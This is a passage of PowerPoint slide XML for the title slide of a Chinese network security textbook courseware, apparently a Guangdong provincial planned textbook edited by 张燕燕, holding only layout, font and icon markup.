              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
